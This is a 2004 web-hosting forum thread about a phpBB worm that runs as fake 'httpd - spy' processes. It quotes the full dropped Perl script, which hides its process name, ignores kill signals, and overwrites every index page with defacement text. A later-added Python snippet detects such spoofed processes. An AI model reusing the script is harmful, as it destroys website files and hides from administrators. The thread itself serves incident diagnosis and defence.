Web Hosting Talk

Spy????


ServerZoo
12-25-2004, 12:43 PM
These days I found my server has A LOT of "Spy"??

5022 root 16 0 15144 6148 12436 S 33.0 0.5 0:08 0 /usr/local/apache/bin/httpd -DSSL
5152 mysql 15 0 52288 20M 3756 S 13.3 2.0 4:36 0 /usr/sbin/mysqld --basedir=/ --datadir=/var/lib/mysql --use
6954 nobody 15 0 12292 7732 6304 S 3.3 0.7 0:01 0 /usr/local/sbin/httpd - spy
6913 nobody 16 0 11000 6452 6304 S 2.7 0.6 0:00 1 /usr/local/sbin/httpd - spy
14847 nobody 16 0 16340 8556 8104 S 1.9 0.8 0:21 0 /usr/local/sbin/httpd - spy
31062 nobody 15 0 15400 8928 8104 D 1.7 0.8 0:09 1 /usr/local/sbin/httpd - spy
21314 nobody 15 0 18780 11M 8104 S 1.5 1.1 0:12 0 /usr/local/sbin/httpd - spy
6417 nobody 16 0 13144 8216 6304 S 1.5 0.7 0:04 1 /usr/local/sbin/httpd - spy
7442 root 17 0 5436 1528 4892 R 1.5 0.1 0:01 0 top -c
27251 nobody 16 0 14840 7748 8104 S 1.3 0.7 0:25 1 /usr/local/sbin/httpd - spy
4446 nobody 16 0 12216 7608 6304 S 1.1 0.7 0:02 1 /usr/local/sbin/httpd - spy
7204 nobody 16 0 11504 6856 6304 S 1.1 0.6 0:00 1 /usr/local/sbin/httpd - spy
7779 mailnull 18 0 0 0 0 Z 1.1 0.0 0:00 0 exim <defunct>
13375 nobody 15 0 12340 6172 6304 S 0.9 0.5 0:08 0 /usr/local/sbin/httpd - spy
27100 nobody 15 0 16336 10M 6304 S 0.9 1.0 0:10 0 /usr/local/sbin/httpd - spy
28185 nobody 15 0 12568 6652 6304 S 0.7 0.6 0:07 0 /usr/local/sbin/httpd - spy
9969 nobody 15 0 9052 3728 6140 S 0.5 0.3 0:00 0 /usr/local/sbin/httpd - spy
22134 nobody 15 0 11312 5420 6140 S 0.5 0.5 0:10 0 /usr/local/sbin/httpd - spy
29751 nobody 15 0 11556 5540 6140 S 0.5 0.5 0:08 1 /usr/local/sbin/httpd - spy
4958 mailnull 15 0 6600 1716 6144 S 0.3 0.1 0:01 0 /usr/sbin/exim -bd -q60m
19674 nobody 15 0 11172 5320 6140 S 0.3 0.5 0:10 1 /usr/local/sbin/httpd - spy
22435 nobody 15 0 19504 11M 8104 S 0.3 1.1 0:22 0 /usr/local/sbin/httpd - spy
22476 nobody 16 0 12076 5536 6304 S 0.3 0.5 0:03 0 /usr/local/sbin/httpd - spy
29277 nobody 15 0 11552 5584 6140 S 0.3 0.5 0:08 0 /usr/local/sbin/httpd - spy
30049 nobody 15 0 11552 5588 6140 S 0.3 0.5 0:07 1 /usr/local/sbin/httpd - spy
31240 nobody 15 0 11668 5680 6140 S 0.3 0.5 0:07 0 /usr/local/sbin/httpd - spy
4449 nobody 15 0 11672 7092 6140 S 0.3 0.6 0:02 0 /usr/local/sbin/httpd - spy
6103 nobody 15 0 11808 6952 6140 S 0.3 0.6 0:01 0 /usr/local/sbin/httpd - spy
6420 nobody 15 0 11820 6628 6140 S 0.3 0.6 0:00 1 /usr/local/sbin/httpd - spy
6957 nobody 15 0 11824 7212 6140 S 0.3 0.6 0:00 0 /usr/local/sbin/httpd - spy
563 root 15 0 0 0 0 SW 0.1 0.0 0:00 1 kjournald


what is this really?

cheers

Protollix
12-25-2004, 01:39 PM
It's actually a perl script that is executed.

Look in your /tmp directory. You probably have 4-5 .txt files in there.

Quarantine those files and kill those "spy" processes.

ServerZoo
12-25-2004, 01:46 PM
em.. I have a lot of .txt files in /tmp!!!

I have set /tmp noexec, how could they run it!!!

what shall I do now?

TopHostSupport
12-25-2004, 02:39 PM
We had this on one of our servers. Killing the process, removing the files from the tmp and upgrading to 4.3.10 fixed the issue for us.

Seems to be linked to the phpbb security issue.

Steven
12-25-2004, 02:50 PM
What I'm wondering about is how they got the files in your /usr/local/sbin

TopHostSupport
12-25-2004, 03:26 PM
In my tmp file I found owned.txt which has this:

==================

#!/usr/bin/perl

# The name the process will advertise in ps/top: it imitates Apache, but it is this perl script.
my $processo = "/usr/local/sbin/httpd - spy";
# Ignore INT/HUP/TERM so a plain kill or Ctrl-C does not stop it (kill -9 still works).
$SIG{"INT"} = "IGNORE";
$SIG{"HUP"} = "IGNORE";
$SIG{"TERM"} = "IGNORE";
$SIG{"CHLD"} = "IGNORE";
$SIG{"PS"} = "IGNORE";   # no such signal exists; this line does nothing

# Rewriting $0 changes what ps/top show as the command line (the ""x16 appends nothing).
$0="$processo".""x16;;
# Fork and exit the parent: the child keeps running in the background, detached from the shell.
my $pid=fork;
exit if $pid;
die "Problema com o fork: $!" unless defined($pid);   # Portuguese: "problem with the fork"

# Collect the path of every index.* file on the whole filesystem into a file named "index".
`find / -name index.* >> index`;

open(a,"<index");
@ind = <a>;
close(a);

# Overwrite every index page found with the defacement text.
foreach(@ind){
chomp;
`echo spykids ownz your server > $_`;
}

# Hand off to a second dropped script in the same directory.
`perl zone.txt`;

eth00
12-25-2004, 03:40 PM
This is part of a new phpBB worm variant, apparently some of them run as -spy. The new versions are apparently working even with patched phpbb's.

TopHostSupport
12-25-2004, 03:43 PM
Originally posted by eth00
This is part of a new phpBB worm variant, apparently some of them run as -spy. The new versions are apparently working even with patched phpbb's.

Any update on how to clean a system? We have removed all the files we could find on the system and killed all the processes, they still keep coming back.

catfishing
12-25-2004, 03:45 PM
Lots of articles on Google about this subject; it seems they hit 50 major businesses in Africa also.

http://www.tecrime.com/llartH18.htm

eth00
12-25-2004, 03:48 PM
Originally posted by eMax
Any update on how to clean a system? We have removed all the files we could find on the system and killed all the processes, they still keep coming back.

Until you figure out where it is coming from you could always remove the perl binary. Then you might start getting errors in messages that will give you some clues. If nothing else, it would stop the processes from reappearing until you can figure out what it is. Depending on how they created it you might be able to reboot the server... but it is still on your server someplace.

Steven
12-25-2004, 03:48 PM
Originally posted by eMax
Any update on how to clean a system? We have removed all the files we could find on the system and killed all the processes, they still keep coming back.

If you don't secure the server any more than it currently is, they are going to come back because there is nothing there to stop them.

Steven
12-25-2004, 03:51 PM
Originally posted by eth00
Until you figure out where it is coming from you could always remove the perl binary. Then you might start getting errors in messages that will give you some clues. If nothing else, it would stop the processes from reappearing until you can figure out what it is. Depending on how they created it you might be able to reboot the server... but it is still on your server someplace.

Why remove the perl binary? Does not sound very smart.

KingAdmin
12-25-2004, 05:26 PM
Just clear /tmp and disable wget for non-root users.

Steven
12-25-2004, 06:37 PM
Originally posted by KingAdmin
Just clear /tmp and disable wget for non-root users.

That's a weak way to fix it.... I've seen attacks going around using lynx and/or curl instead of wget

TopHostSupport
12-25-2004, 06:40 PM
Originally posted by thelinuxguy
That's a weak way to fix it.... I've seen attacks going around using lynx and/or curl instead of wget

No disrespect, but I have seen you trash 2 people's suggestions but you have YET to post one.

Step up or pipe up.. I guess the old saying goes. :o

KingAdmin
12-25-2004, 09:26 PM
Originally posted by thelinuxguy
What im wondering about is how they got the files in your /usr/local/sbin
Just because the script claims its path is in /usr/local/sbin doesn't mean that is a real path where it's located.
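KingAdmin's point (and the `$0 = "/usr/local/sbin/httpd - spy"` line in the dropped script quoted above) can be checked directly: compare what a process claims in argv[0] with the binary that /proc/<pid>/exe actually resolves to. This is an added example, not code from the thread; the sample process list is constructed to mirror the top output above, and daemons that legitimately rewrite their own title (sshd, postgres) may still need a manual look.

```python
import os

def is_spoofed(cmdline: str, exe: str) -> bool:
    """True when argv[0] (from /proc/<pid>/cmdline, NULs as spaces) names a program other than the /proc/<pid>/exe target."""
    if not cmdline or not exe:
        return False  # kernel threads (kjournald) or unreadable exe link: nothing to compare
    # "-bash" marks a login shell and "sshd: user@pts" is a rewritten title; strip both decorations.
    claimed = os.path.basename(cmdline.split(" ", 1)[0]).lstrip("-").rstrip(":")
    # A binary replaced on disk while still running shows up as "/usr/bin/perl (deleted)".
    actual = os.path.basename(exe.replace(" (deleted)", ""))
    # startswith lets argv[0] "perl" match exe "perl5.8.8"; a claimed "httpd" never matches "perl".
    return not actual.startswith(claimed)

def find_spoofed(procs):
    """procs: iterable of (pid, cmdline, exe). Returns the pids whose name does not match their binary."""
    return [pid for pid, cmd, exe in procs if is_spoofed(cmd, exe)]

def read_live_procs():
    """Read (pid, cmdline, exe) for every process in /proc (run as root to read other users' exe links)."""
    procs = []
    for name in os.listdir("/proc"):
        if not name.isdigit():
            continue
        try:
            with open(f"/proc/{name}/cmdline", "rb") as f:
                cmd = f.read().replace(b"\0", b" ").decode("utf-8", "replace").strip()
        except OSError:
            continue  # process exited between listdir and open
        try:
            exe = os.readlink(f"/proc/{name}/exe")
        except OSError:
            exe = ""  # kernel thread, or permission denied
        procs.append((int(name), cmd, exe))
    return procs

# Constructed sample mirroring the top(1) listing in the thread (not real captured data).
SAMPLE = [
    (5022, "/usr/local/apache/bin/httpd -DSSL", "/usr/local/apache/bin/httpd"),
    (6954, "/usr/local/sbin/httpd - spy", "/usr/bin/perl"),  # the worm: claims httpd, runs perl
    (7442, "top -c", "/usr/bin/top"),
    (563, "", ""),                                           # kjournald kernel thread
    (9001, "-bash", "/bin/bash"),                            # login shell
    (9002, "perl zone.txt", "/usr/bin/perl5.8.8"),           # versioned interpreter binary
]

if __name__ == "__main__":
    for pid, cmd, exe in read_live_procs():
        if is_spoofed(cmd, exe):
            print(f"pid {pid}: claims {cmd!r} but is running {exe}")
```

On the sample list only pid 6954 is reported; against a live box, review each hit by hand before killing anything.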

ServerZoo
12-25-2004, 11:32 PM
We removed all .txt files in /tmp and closed all dangerous phpBB scripts. Things seem to have calmed down a bit now